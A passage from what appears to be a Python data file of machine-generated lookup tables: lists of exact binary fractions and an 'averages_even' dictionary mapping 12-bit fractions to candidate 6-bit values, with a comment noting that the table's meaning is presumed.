0.353271484375, 0.355224609375, 0.357177734375, 0.3583984375, 0.359130859375, 0.359375, 0.361083984375, 0.363037109375, 
0.364990234375, 0.3662109375, 0.366943359375, 0.368896484375, 0.370849609375, 0.37109375, 0.372802734375, 0.3740234375, 0.374755859375, 0.375, 0.376708984375, 0.378662109375, 0.380615234375, 0.3818359375, 0.382568359375, 0.384521484375, 0.386474609375, 0.388427734375, 0.3896484375, 0.390380859375, 0.390625, 0.392333984375, 0.394287109375, 0.396240234375, 0.3974609375, 0.398193359375, 0.400146484375, 0.402099609375, 0.40234375, 0.404052734375, 0.4052734375, 0.406005859375, 0.40625, 0.407958984375, 0.409912109375, 0.411865234375, 0.4130859375, 0.413818359375, 0.415771484375, 0.417724609375, 0.419677734375, 0.4208984375, 0.421630859375, 0.421875, 0.423583984375, 0.425537109375, 0.427490234375, 0.4287109375, 0.429443359375, 0.431396484375, 0.433349609375, 0.43359375, 0.435302734375, 0.4365234375, 0.437255859375, 0.4375, 0.439208984375, 0.441162109375, 0.443115234375, 0.4443359375, 0.445068359375, 0.447021484375, 0.448974609375, 0.450927734375, 0.4521484375, 0.452880859375, 0.453125, 0.454833984375, 0.456787109375, 0.458740234375, 0.4599609375, 0.460693359375, 0.462646484375, 0.464599609375, 0.46484375, 0.466552734375, 0.4677734375, 0.468505859375, 0.46875, 0.470458984375, 0.472412109375, 0.474365234375, 0.4755859375, 0.476318359375, 0.478271484375, 0.480224609375, 0.482177734375, 0.4833984375, 0.484130859375, 0.484375, 0.486083984375, 0.488037109375, 0.489990234375, 0.4912109375, 0.491943359375, 0.493896484375, 0.495849609375, 0.49609375, 0.497802734375, 0.4990234375, 0.499755859375, 0.5, 0.501708984375, 0.503662109375, 0.505615234375, 0.5068359375, 0.507568359375, 0.509521484375, 0.511474609375, 0.513427734375, 0.5146484375, 0.515380859375, 0.515625, 0.517333984375, 0.519287109375, 0.521240234375, 0.5224609375, 0.523193359375, 0.525146484375, 0.527099609375, 0.52734375, 0.529052734375, 0.5302734375, 0.531005859375, 0.53125, 0.532958984375, 0.534912109375, 0.536865234375, 0.5380859375, 0.538818359375, 0.540771484375, 0.542724609375, 0.544677734375, 0.5458984375, 
0.546630859375, 0.546875, 0.548583984375, 0.550537109375, 0.552490234375, 0.5537109375, 0.554443359375, 0.556396484375, 0.558349609375, 0.55859375, 0.560302734375, 0.5615234375, 0.562255859375, 0.5625, 0.564208984375, 0.566162109375, 0.568115234375, 0.5693359375, 0.570068359375, 0.572021484375, 0.573974609375, 0.575927734375, 0.5771484375, 0.577880859375, 0.578125, 0.579833984375, 0.581787109375, 0.583740234375, 0.5849609375, 0.585693359375, 0.587646484375, 0.589599609375, 0.58984375, 0.591552734375, 0.5927734375, 0.593505859375, 0.59375, 0.595458984375, 0.597412109375, 0.599365234375, 0.6005859375, 0.601318359375, 0.603271484375, 0.605224609375, 0.607177734375, 0.6083984375, 0.609130859375, 0.609375, 0.611083984375, 0.613037109375, 0.614990234375, 0.6162109375, 0.616943359375, 0.618896484375, 0.620849609375, 0.62109375, 0.622802734375, 0.6240234375, 0.624755859375, 0.625, 0.626708984375, 0.628662109375, 0.630615234375, 0.6318359375, 0.632568359375, 0.634521484375, 0.636474609375, 0.638427734375, 0.6396484375, 0.640380859375, 0.640625, 0.642333984375, 0.644287109375, 0.646240234375, 0.6474609375, 0.648193359375, 0.650146484375, 0.652099609375, 0.65234375, 0.654052734375, 0.6552734375, 0.656005859375, 0.65625, 0.657958984375, 0.659912109375, 0.661865234375, 0.6630859375, 0.663818359375, 0.665771484375, 0.667724609375, 0.669677734375, 0.6708984375, 0.671630859375, 0.671875, 0.673583984375, 0.675537109375, 0.677490234375, 0.6787109375, 0.679443359375, 0.681396484375, 0.683349609375, 0.68359375, 0.685302734375, 0.6865234375, 0.687255859375, 0.6875, 0.689208984375, 0.691162109375, 0.693115234375, 0.6943359375, 0.695068359375, 0.697021484375, 0.698974609375, 0.700927734375, 0.7021484375, 0.702880859375, 0.703125, 0.704833984375, 0.706787109375, 0.708740234375, 0.7099609375, 0.710693359375, 0.712646484375, 0.714599609375, 0.71484375, 0.716552734375, 0.7177734375, 0.718505859375, 0.71875, 0.720458984375, 0.722412109375, 0.724365234375, 0.7255859375, 0.726318359375, 
0.728271484375, 0.730224609375, 0.732177734375, 0.7333984375, 0.734130859375, 0.734375, 0.736083984375, 0.738037109375, 0.739990234375, 0.7412109375, 0.741943359375, 0.743896484375, 0.745849609375, 0.74609375, 0.747802734375, 0.7490234375, 0.749755859375, 0.75, 0.751708984375, 0.753662109375, 0.755615234375, 0.7568359375, 0.757568359375, 0.759521484375, 0.761474609375, 0.763427734375, 0.7646484375, 0.765380859375, 0.765625, 0.767333984375, 0.769287109375, 0.771240234375, 0.7724609375, 0.773193359375, 0.775146484375, 0.777099609375, 0.77734375, 0.779052734375, 0.7802734375, 0.781005859375, 0.78125, 0.782958984375, 0.784912109375, 0.786865234375, 0.7880859375, 0.788818359375, 0.790771484375, 0.792724609375, 0.794677734375, 0.7958984375, 0.796630859375, 0.796875, 0.798583984375, 0.800537109375, 0.802490234375, 0.8037109375, 0.804443359375, 0.806396484375, 0.808349609375, 0.80859375, 0.810302734375, 0.8115234375, 0.812255859375, 0.8125, 0.814208984375, 0.816162109375, 0.818115234375, 0.8193359375, 0.820068359375, 0.822021484375, 0.823974609375, 0.825927734375, 0.8271484375, 0.827880859375, 0.828125, 0.829833984375, 0.831787109375, 0.833740234375, 0.8349609375, 0.835693359375, 0.837646484375, 0.839599609375, 0.83984375, 0.841552734375, 0.8427734375, 0.843505859375, 0.84375, 0.845458984375, 0.847412109375, 0.849365234375, 0.8505859375, 0.851318359375, 0.853271484375, 0.855224609375, 0.857177734375, 0.8583984375, 0.859130859375, 0.859375, 0.861083984375, 0.863037109375, 0.864990234375, 0.8662109375, 0.866943359375, 0.868896484375, 0.870849609375, 0.87109375, 0.872802734375, 0.8740234375, 0.874755859375, 0.875, 0.876708984375, 0.878662109375, 0.880615234375, 0.8818359375, 0.882568359375, 0.884521484375, 0.886474609375, 0.888427734375, 0.8896484375, 0.890380859375, 0.890625, 0.892333984375, 0.894287109375, 0.896240234375, 0.8974609375, 0.898193359375, 0.900146484375, 0.902099609375, 0.90234375, 0.904052734375, 0.9052734375, 0.906005859375, 0.90625, 0.907958984375, 
0.909912109375, 0.911865234375, 0.9130859375, 0.913818359375, 0.915771484375, 0.917724609375, 0.919677734375, 0.9208984375, 0.921630859375, 0.921875, 0.923583984375, 0.925537109375, 0.927490234375, 0.9287109375, 0.929443359375, 0.931396484375, 0.933349609375, 0.93359375, 0.935302734375, 0.9365234375, 0.937255859375, 0.9375, 0.939208984375, 0.941162109375, 0.943115234375, 0.9443359375, 0.945068359375, 0.947021484375, 0.948974609375, 0.950927734375, 0.9521484375, 0.952880859375, 0.953125, 0.954833984375, 0.956787109375, 0.958740234375, 0.9599609375, 0.960693359375, 0.962646484375, 0.964599609375, 0.96484375, 0.966552734375, 0.9677734375, 0.968505859375, 0.96875, 0.970458984375, 0.972412109375, 0.974365234375, 0.9755859375, 0.976318359375, 0.978271484375, 0.980224609375, 0.982177734375, 0.9833984375, 0.984130859375, 0.984375, 0.986083984375, 0.988037109375, 0.989990234375, 0.9912109375, 0.991943359375, 0.993896484375, 0.995849609375, 0.99609375, 0.997802734375, 0.9990234375, 0.999755859375]
pattern_even=[0.0, 0.001708984375, 0.003662109375, 0.005615234375, 0.0068359375, 0.007568359375, 0.009521484375, 0.011474609375, 0.013427734375, 0.0146484375, 0.015380859375, 0.015625, 0.017333984375, 0.019287109375, 0.021240234375, 0.0224609375, 0.023193359375, 0.025146484375, 0.027099609375, 0.02734375, 0.029052734375, 0.0302734375, 0.031005859375, 0.03125, 0.032958984375, 0.034912109375, 0.036865234375, 0.0380859375, 0.038818359375, 0.040771484375, 0.042724609375, 0.044677734375, 0.0458984375, 0.046630859375, 0.046875, 0.048583984375, 0.050537109375, 0.052490234375, 0.0537109375, 0.054443359375, 0.056396484375, 0.058349609375, 0.05859375, 0.060302734375, 0.0615234375, 0.062255859375, 0.0625, 0.064208984375, 0.066162109375, 0.068115234375, 0.0693359375, 0.070068359375, 0.072021484375, 0.073974609375, 0.075927734375, 0.0771484375, 0.077880859375, 0.078125, 0.079833984375, 0.081787109375, 0.083740234375, 0.0849609375, 0.085693359375, 0.087646484375, 0.089599609375, 0.08984375, 0.091552734375, 0.0927734375, 0.093505859375, 0.09375, 0.095458984375, 0.097412109375, 0.099365234375, 0.1005859375, 0.101318359375, 0.103271484375, 0.105224609375, 0.107177734375, 0.1083984375, 0.109130859375, 0.109375, 0.111083984375, 0.113037109375, 0.114990234375, 0.1162109375, 0.116943359375, 0.118896484375, 0.120849609375, 0.12109375, 0.122802734375, 0.1240234375, 0.124755859375, 0.125, 0.126708984375, 0.128662109375, 0.130615234375, 0.1318359375, 0.132568359375, 0.134521484375, 0.136474609375, 0.138427734375, 0.1396484375, 0.140380859375, 0.140625, 0.142333984375, 0.144287109375, 0.146240234375, 0.1474609375, 0.148193359375, 0.150146484375, 0.152099609375, 0.15234375, 0.154052734375, 0.1552734375, 0.156005859375, 0.15625, 0.157958984375, 0.159912109375, 0.161865234375, 0.1630859375, 0.163818359375, 0.165771484375, 0.167724609375, 0.169677734375, 0.1708984375, 0.171630859375, 0.171875, 0.173583984375, 0.175537109375, 0.177490234375, 0.1787109375, 0.179443359375, 0.181396484375, 
0.183349609375, 0.18359375, 0.185302734375, 0.1865234375, 0.187255859375, 0.1875, 0.189208984375, 0.191162109375, 0.193115234375, 0.1943359375, 0.195068359375, 0.197021484375, 0.198974609375, 0.200927734375, 0.2021484375, 0.202880859375, 0.203125, 0.204833984375, 0.206787109375, 0.208740234375, 0.2099609375, 0.210693359375, 0.212646484375, 0.214599609375, 0.21484375, 0.216552734375, 0.2177734375, 0.218505859375, 0.21875, 0.220458984375, 0.222412109375, 0.224365234375, 0.2255859375, 0.226318359375, 0.228271484375, 0.230224609375, 0.232177734375, 0.2333984375, 0.234130859375, 0.234375, 0.236083984375, 0.238037109375, 0.239990234375, 0.2412109375, 0.241943359375, 0.243896484375, 0.245849609375, 0.24609375, 0.247802734375, 0.2490234375, 0.249755859375, 0.25, 0.251708984375, 0.253662109375, 0.255615234375, 0.2568359375, 0.257568359375, 0.259521484375, 0.261474609375, 0.263427734375, 0.2646484375, 0.265380859375, 0.265625, 0.267333984375, 0.269287109375, 0.271240234375, 0.2724609375, 0.273193359375, 0.275146484375, 0.277099609375, 0.27734375, 0.279052734375, 0.2802734375, 0.281005859375, 0.28125, 0.282958984375, 0.284912109375, 0.286865234375, 0.2880859375, 0.288818359375, 0.290771484375, 0.292724609375, 0.294677734375, 0.2958984375, 0.296630859375, 0.296875, 0.298583984375, 0.300537109375, 0.302490234375, 0.3037109375, 0.304443359375, 0.306396484375, 0.308349609375, 0.30859375, 0.310302734375, 0.3115234375, 0.312255859375, 0.3125, 0.314208984375, 0.316162109375, 0.318115234375, 0.3193359375, 0.320068359375, 0.322021484375, 0.323974609375, 0.325927734375, 0.3271484375, 0.327880859375, 0.328125, 0.329833984375, 0.331787109375, 0.333740234375, 0.3349609375, 0.335693359375, 0.337646484375, 0.339599609375, 0.33984375, 0.341552734375, 0.3427734375, 0.343505859375, 0.34375, 0.345458984375, 0.347412109375, 0.349365234375, 0.3505859375, 0.351318359375, 0.353271484375, 0.355224609375, 0.357177734375, 0.3583984375, 0.359130859375, 0.359375, 0.361083984375, 0.363037109375, 
0.364990234375, 0.3662109375, 0.366943359375, 0.368896484375, 0.370849609375, 0.37109375, 0.372802734375, 0.3740234375, 0.374755859375, 0.375, 0.376708984375, 0.378662109375, 0.380615234375, 0.3818359375, 0.382568359375, 0.384521484375, 0.386474609375, 0.388427734375, 0.3896484375, 0.390380859375, 0.390625, 0.392333984375, 0.394287109375, 0.396240234375, 0.3974609375, 0.398193359375, 0.400146484375, 0.402099609375, 0.40234375, 0.404052734375, 0.4052734375, 0.406005859375, 0.40625, 0.407958984375, 0.409912109375, 0.411865234375, 0.4130859375, 0.413818359375, 0.415771484375, 0.417724609375, 0.419677734375, 0.4208984375, 0.421630859375, 0.421875, 0.423583984375, 0.425537109375, 0.427490234375, 0.4287109375, 0.429443359375, 0.431396484375, 0.433349609375, 0.43359375, 0.435302734375, 0.4365234375, 0.437255859375, 0.4375, 0.439208984375, 0.441162109375, 0.443115234375, 0.4443359375, 0.445068359375, 0.447021484375, 0.448974609375, 0.450927734375, 0.4521484375, 0.452880859375, 0.453125, 0.454833984375, 0.456787109375, 0.458740234375, 0.4599609375, 0.460693359375, 0.462646484375, 0.464599609375, 0.46484375, 0.466552734375, 0.4677734375, 0.468505859375, 0.46875, 0.470458984375, 0.472412109375, 0.474365234375, 0.4755859375, 0.476318359375, 0.478271484375, 0.480224609375, 0.482177734375, 0.4833984375, 0.484130859375, 0.484375, 0.486083984375, 0.488037109375, 0.489990234375, 0.4912109375, 0.491943359375, 0.493896484375, 0.495849609375, 0.49609375, 0.497802734375, 0.4990234375, 0.499755859375, 0.5, 0.501708984375, 0.503662109375, 0.505615234375, 0.5068359375, 0.507568359375, 0.509521484375, 0.511474609375, 0.513427734375, 0.5146484375, 0.515380859375, 0.515625, 0.517333984375, 0.519287109375, 0.521240234375, 0.5224609375, 0.523193359375, 0.525146484375, 0.527099609375, 0.52734375, 0.529052734375, 0.5302734375, 0.531005859375, 0.53125, 0.532958984375, 0.534912109375, 0.536865234375, 0.5380859375, 0.538818359375, 0.540771484375, 0.542724609375, 0.544677734375, 0.5458984375, 
0.546630859375, 0.546875, 0.548583984375, 0.550537109375, 0.552490234375, 0.5537109375, 0.554443359375, 0.556396484375, 0.558349609375, 0.55859375, 0.560302734375, 0.5615234375, 0.562255859375, 0.5625, 0.564208984375, 0.566162109375, 0.568115234375, 0.5693359375, 0.570068359375, 0.572021484375, 0.573974609375, 0.575927734375, 0.5771484375, 0.577880859375, 0.578125, 0.579833984375, 0.581787109375, 0.583740234375, 0.5849609375, 0.585693359375, 0.587646484375, 0.589599609375, 0.58984375, 0.591552734375, 0.5927734375, 0.593505859375, 0.59375, 0.595458984375, 0.597412109375, 0.599365234375, 0.6005859375, 0.601318359375, 0.603271484375, 0.605224609375, 0.607177734375, 0.6083984375, 0.609130859375, 0.609375, 0.611083984375, 0.613037109375, 0.614990234375, 0.6162109375, 0.616943359375, 0.618896484375, 0.620849609375, 0.62109375, 0.622802734375, 0.6240234375, 0.624755859375, 0.625, 0.626708984375, 0.628662109375, 0.630615234375, 0.6318359375, 0.632568359375, 0.634521484375, 0.636474609375, 0.638427734375, 0.6396484375, 0.640380859375, 0.640625, 0.642333984375, 0.644287109375, 0.646240234375, 0.6474609375, 0.648193359375, 0.650146484375, 0.652099609375, 0.65234375, 0.654052734375, 0.6552734375, 0.656005859375, 0.65625, 0.657958984375, 0.659912109375, 0.661865234375, 0.6630859375, 0.663818359375, 0.665771484375, 0.667724609375, 0.669677734375, 0.6708984375, 0.671630859375, 0.671875, 0.673583984375, 0.675537109375, 0.677490234375, 0.6787109375, 0.679443359375, 0.681396484375, 0.683349609375, 0.68359375, 0.685302734375, 0.6865234375, 0.687255859375, 0.6875, 0.689208984375, 0.691162109375, 0.693115234375, 0.6943359375, 0.695068359375, 0.697021484375, 0.698974609375, 0.700927734375, 0.7021484375, 0.702880859375, 0.703125, 0.704833984375, 0.706787109375, 0.708740234375, 0.7099609375, 0.710693359375, 0.712646484375, 0.714599609375, 0.71484375, 0.716552734375, 0.7177734375, 0.718505859375, 0.71875, 0.720458984375, 0.722412109375, 0.724365234375, 0.7255859375, 0.726318359375, 
0.728271484375, 0.730224609375, 0.732177734375, 0.7333984375, 0.734130859375, 0.734375, 0.736083984375, 0.738037109375, 0.739990234375, 0.7412109375, 0.741943359375, 0.743896484375, 0.745849609375, 0.74609375, 0.747802734375, 0.7490234375, 0.749755859375, 0.75, 0.751708984375, 0.753662109375, 0.755615234375, 0.7568359375, 0.757568359375, 0.759521484375, 0.761474609375, 0.763427734375, 0.7646484375, 0.765380859375, 0.765625, 0.767333984375, 0.769287109375, 0.771240234375, 0.7724609375, 0.773193359375, 0.775146484375, 0.777099609375, 0.77734375, 0.779052734375, 0.7802734375, 0.781005859375, 0.78125, 0.782958984375, 0.784912109375, 0.786865234375, 0.7880859375, 0.788818359375, 0.790771484375, 0.792724609375, 0.794677734375, 0.7958984375, 0.796630859375, 0.796875, 0.798583984375, 0.800537109375, 0.802490234375, 0.8037109375, 0.804443359375, 0.806396484375, 0.808349609375, 0.80859375, 0.810302734375, 0.8115234375, 0.812255859375, 0.8125, 0.814208984375, 0.816162109375, 0.818115234375, 0.8193359375, 0.820068359375, 0.822021484375, 0.823974609375, 0.825927734375, 0.8271484375, 0.827880859375, 0.828125, 0.829833984375, 0.831787109375, 0.833740234375, 0.8349609375, 0.835693359375, 0.837646484375, 0.839599609375, 0.83984375, 0.841552734375, 0.8427734375, 0.843505859375, 0.84375, 0.845458984375, 0.847412109375, 0.849365234375, 0.8505859375, 0.851318359375, 0.853271484375, 0.855224609375, 0.857177734375, 0.8583984375, 0.859130859375, 0.859375, 0.861083984375, 0.863037109375, 0.864990234375, 0.8662109375, 0.866943359375, 0.868896484375, 0.870849609375, 0.87109375, 0.872802734375, 0.8740234375, 0.874755859375, 0.875, 0.876708984375, 0.878662109375, 0.880615234375, 0.8818359375, 0.882568359375, 0.884521484375, 0.886474609375, 0.888427734375, 0.8896484375, 0.890380859375, 0.890625, 0.892333984375, 0.894287109375, 0.896240234375, 0.8974609375, 0.898193359375, 0.900146484375, 0.902099609375, 0.90234375, 0.904052734375, 0.9052734375, 0.906005859375, 0.90625, 0.907958984375, 
0.909912109375, 0.911865234375, 0.9130859375, 0.913818359375, 0.915771484375, 0.917724609375, 0.919677734375, 0.9208984375, 0.921630859375, 0.921875, 0.923583984375, 0.925537109375, 0.927490234375, 0.9287109375, 0.929443359375, 0.931396484375, 0.933349609375, 0.93359375, 0.935302734375, 0.9365234375, 0.937255859375, 0.9375, 0.939208984375, 0.941162109375, 0.943115234375, 0.9443359375, 0.945068359375, 0.947021484375, 0.948974609375, 0.950927734375, 0.9521484375, 0.952880859375, 0.953125, 0.954833984375, 0.956787109375, 0.958740234375, 0.9599609375, 0.960693359375, 0.962646484375, 0.964599609375, 0.96484375, 0.966552734375, 0.9677734375, 0.968505859375, 0.96875, 0.970458984375, 0.972412109375, 0.974365234375, 0.9755859375, 0.976318359375, 0.978271484375, 0.980224609375, 0.982177734375, 0.9833984375, 0.984130859375, 0.984375, 0.986083984375, 0.988037109375, 0.989990234375, 0.9912109375, 0.991943359375, 0.993896484375, 0.995849609375, 0.99609375, 0.997802734375, 0.9990234375, 0.999755859375]
# Precomputed lookup table (machine-generated data — do not edit by hand).
# Every key is an exact binary fraction with denominator 4096 (12 fractional
# bits) and every value is a list of exact binary fractions with denominator
# 64 (6 fractional bits), so all floats here are represented exactly.
# NOTE(review): presumably each key is a target average and the list holds the
# candidate 6-bit values that realize it for the "even" case (a sibling
# `averages_odd` table with the same shape follows) — confirm against the
# generator script before relying on this interpretation.
averages_even={0.0: [0.25, 0.5, 0.75, 0.0], 0.001708984375: [0.328125, 0.671875], 0.216552734375: [0.453125, 0.546875], 0.974365234375: [0.796875, 0.203125], 0.0068359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.029052734375: [0.453125, 0.546875], 0.505615234375: [0.796875, 0.203125], 0.0693359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.681396484375: [0.421875, 0.578125], 0.425537109375: [0.390625, 0.609375], 0.732177734375: [0.953125, 0.046875], 0.892333984375: [0.828125, 0.171875], 0.5380859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.915771484375: [0.921875, 0.078125], 0.5: [0.5, 0.75, 0.0, 0.25], 0.4208984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.800537109375: [0.390625, 0.609375], 0.595458984375: [0.671875, 0.328125], 0.493896484375: [0.421875, 0.578125], 0.052490234375: [0.296875, 0.703125], 0.966552734375: [0.453125, 0.546875], 0.558349609375: [0.859375, 0.140625], 0.007568359375: [0.265625, 0.734375], 0.937255859375: [0.484375, 0.515625], 0.372802734375: [0.453125, 0.546875], 0.148193359375: [0.234375, 0.765625], 0.568115234375: [0.796875, 0.203125], 0.8115234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.695068359375: [0.734375, 0.265625], 0.65625: [0.5, 0.75, 0.0, 0.25], 0.251708984375: [0.328125, 0.671875], 0.441162109375: [0.890625, 0.109375], 0.40234375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.154052734375: [0.453125, 0.546875], 0.081787109375: [0.390625, 0.609375], 0.650146484375: [0.421875, 0.578125], 0.5693359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.5302734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.4365234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.831787109375: [0.390625, 0.609375], 0.320068359375: [0.265625, 0.734375], 0.28125: [0.25, 0.5, 0.75, 0.0], 0.7802734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.625: [0.5, 0.75, 0.0, 0.25], 0.054443359375: [0.234375, 0.765625], 0.589599609375: [0.859375, 0.140625], 0.968505859375: [0.484375, 0.515625], 0.388427734375: [0.953125, 0.046875], 0.156005859375: [0.484375, 
0.515625], 0.8427734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.507568359375: [0.734375, 0.265625], 0.0771484375: [0.28125, 0.71875, 0.78125, 0.21875], 0.267333984375: [0.828125, 0.171875], 0.456787109375: [0.390625, 0.609375], 0.794677734375: [0.953125, 0.046875], 0.085693359375: [0.765625, 0.234375], 0.6005859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.53125: [0.5, 0.75, 0.0, 0.25], 0.24609375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.4521484375: [0.28125, 0.71875, 0.78125, 0.21875], 0.863037109375: [0.390625, 0.609375], 0.335693359375: [0.765625, 0.234375], 0.296875: [0.375, 0.625, 0.875, 0.125], 0.552490234375: [0.703125, 0.296875], 0.224365234375: [0.796875, 0.203125], 0.620849609375: [0.859375, 0.140625], 0.1240234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.999755859375: [0.484375, 0.515625], 0.404052734375: [0.453125, 0.546875], 0.163818359375: [0.265625, 0.734375], 0.759521484375: [0.921875, 0.078125], 0.125: [0.25, 0.5, 0.75, 0.0], 0.8740234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.757568359375: [0.734375, 0.265625], 0.71875: [0.5, 0.75, 0.0, 0.25], 0.282958984375: [0.328125, 0.671875], 0.015380859375: [0.984375, 0.015625], 0.825927734375: [0.953125, 0.046875], 0.089599609375: [0.859375, 0.140625], 0.407958984375: [0.328125, 0.671875], 0.4677734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.894287109375: [0.390625, 0.609375], 0.351318359375: [0.734375, 0.265625], 0.3125: [0.25, 0.5, 0.75, 0.0], 0.583740234375: [0.703125, 0.296875], 0.665771484375: [0.921875, 0.078125], 0.232177734375: [0.953125, 0.046875], 0.017333984375: [0.828125, 0.171875], 0.652099609375: [0.859375, 0.140625], 0.814208984375: [0.671875, 0.328125], 0.419677734375: [0.953125, 0.046875], 0.171630859375: [0.984375, 0.015625], 0.9052734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.509521484375: [0.921875, 0.078125], 0.0849609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.009521484375: [0.921875, 0.078125], 0.736083984375: [0.828125, 0.171875], 0.488037109375: 
[0.390625, 0.609375], 0.857177734375: [0.953125, 0.046875], 0.093505859375: [0.484375, 0.515625], 0.236083984375: [0.828125, 0.171875], 0.6630859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.546630859375: [0.984375, 0.015625], 0.4833984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.925537109375: [0.390625, 0.609375], 0.208740234375: [0.296875, 0.703125], 0.328125: [0.375, 0.625, 0.875, 0.125], 0.614990234375: [0.296875, 0.703125], 0.048583984375: [0.828125, 0.171875], 0.239990234375: [0.296875, 0.703125], 0.683349609375: [0.859375, 0.140625], 0.572021484375: [0.921875, 0.078125], 0.806396484375: [0.421875, 0.578125], 0.435302734375: [0.453125, 0.546875], 0.179443359375: [0.765625, 0.234375], 0.140625: [0.375, 0.625, 0.875, 0.125], 0.9365234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.820068359375: [0.734375, 0.265625], 0.78125: [0.5, 0.75, 0.0, 0.25], 0.314208984375: [0.328125, 0.671875], 0.46484375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.0537109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.097412109375: [0.890625, 0.109375], 0.6943359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.577880859375: [0.984375, 0.015625], 0.566162109375: [0.890625, 0.109375], 0.4990234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.956787109375: [0.390625, 0.609375], 0.382568359375: [0.734375, 0.265625], 0.34375: [0.5, 0.75, 0.0, 0.25], 0.646240234375: [0.703125, 0.296875], 0.626708984375: [0.328125, 0.671875], 0.247802734375: [0.453125, 0.546875], 0.714599609375: [0.859375, 0.140625], 0.261474609375: [0.359375, 0.640625], 0.02734375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.7568359375: [0.65625, 0.84375, 0.15625, 0.34375], 0.450927734375: [0.953125, 0.046875], 0.187255859375: [0.484375, 0.515625], 0.2568359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.0458984375: [0.21875, 0.28125, 0.71875, 0.78125], 0.9677734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.511474609375: [0.359375, 0.640625], 0.0927734375: [0.46875, 0.53125, 0.96875, 0.03125], 
0.329833984375: [0.828125, 0.171875], 0.126708984375: [0.328125, 0.671875], 0.919677734375: [0.953125, 0.046875], 0.101318359375: [0.265625, 0.734375], 0.161865234375: [0.796875, 0.203125], 0.7255859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.609130859375: [0.984375, 0.015625], 0.0625: [0.25, 0.5, 0.75, 0.0], 0.579833984375: [0.828125, 0.171875], 0.988037109375: [0.390625, 0.609375], 0.398193359375: [0.765625, 0.234375], 0.359375: [0.375, 0.625, 0.875, 0.125], 0.677490234375: [0.703125, 0.296875], 0.745849609375: [0.859375, 0.140625], 0.277099609375: [0.859375, 0.140625], 0.466552734375: [0.453125, 0.546875], 0.195068359375: [0.265625, 0.734375], 0.15625: [0.25, 0.5, 0.75, 0.0], 0.2724609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.822021484375: [0.921875, 0.078125], 0.9990234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.882568359375: [0.734375, 0.265625], 0.84375: [0.5, 0.75, 0.0, 0.25], 0.345458984375: [0.328125, 0.671875], 0.134521484375: [0.921875, 0.078125], 0.49609375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.950927734375: [0.953125, 0.046875], 0.105224609375: [0.359375, 0.640625], 0.363037109375: [0.390625, 0.609375], 0.640380859375: [0.984375, 0.015625], 0.413818359375: [0.734375, 0.265625], 0.375: [0.5, 0.75, 0.0, 0.25], 0.708740234375: [0.703125, 0.296875], 0.763427734375: [0.953125, 0.046875], 0.777099609375: [0.859375, 0.140625], 0.292724609375: [0.359375, 0.640625], 0.43359375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.482177734375: [0.953125, 0.046875], 0.202880859375: [0.984375, 0.015625], 0.790771484375: [0.921875, 0.078125], 0.534912109375: [0.890625, 0.109375], 0.663818359375: [0.734375, 0.265625], 0.513427734375: [0.953125, 0.046875], 0.1005859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.361083984375: [0.828125, 0.171875], 0.603271484375: [0.921875, 0.078125], 0.0615234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.109130859375: [0.984375, 0.015625], 0.7880859375: [0.34375, 0.65625, 0.84375, 
0.15625], 0.671630859375: [0.984375, 0.015625], 0.429443359375: [0.765625, 0.234375], 0.390625: [0.375, 0.625, 0.875, 0.125], 0.739990234375: [0.703125, 0.296875], 0.5458984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.808349609375: [0.859375, 0.140625], 0.845458984375: [0.671875, 0.328125], 0.077880859375: [0.984375, 0.015625], 0.861083984375: [0.828125, 0.171875], 0.497802734375: [0.453125, 0.546875], 0.210693359375: [0.234375, 0.765625], 0.3037109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.548583984375: [0.828125, 0.171875], 0.945068359375: [0.734375, 0.265625], 0.90625: [0.5, 0.75, 0.0, 0.25], 0.376708984375: [0.328125, 0.671875], 0.150146484375: [0.421875, 0.578125], 0.113037109375: [0.390625, 0.609375], 0.8193359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.5068359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.255615234375: [0.796875, 0.203125], 0.445068359375: [0.265625, 0.734375], 0.40625: [0.5, 0.75, 0.0, 0.25], 0.771240234375: [0.703125, 0.296875], 0.900146484375: [0.421875, 0.578125], 0.5771484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.839599609375: [0.859375, 0.140625], 0.323974609375: [0.359375, 0.640625], 0.913818359375: [0.734375, 0.265625], 0.875: [0.5, 0.75, 0.0, 0.25], 0.218505859375: [0.484375, 0.515625], 0.3193359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.597412109375: [0.890625, 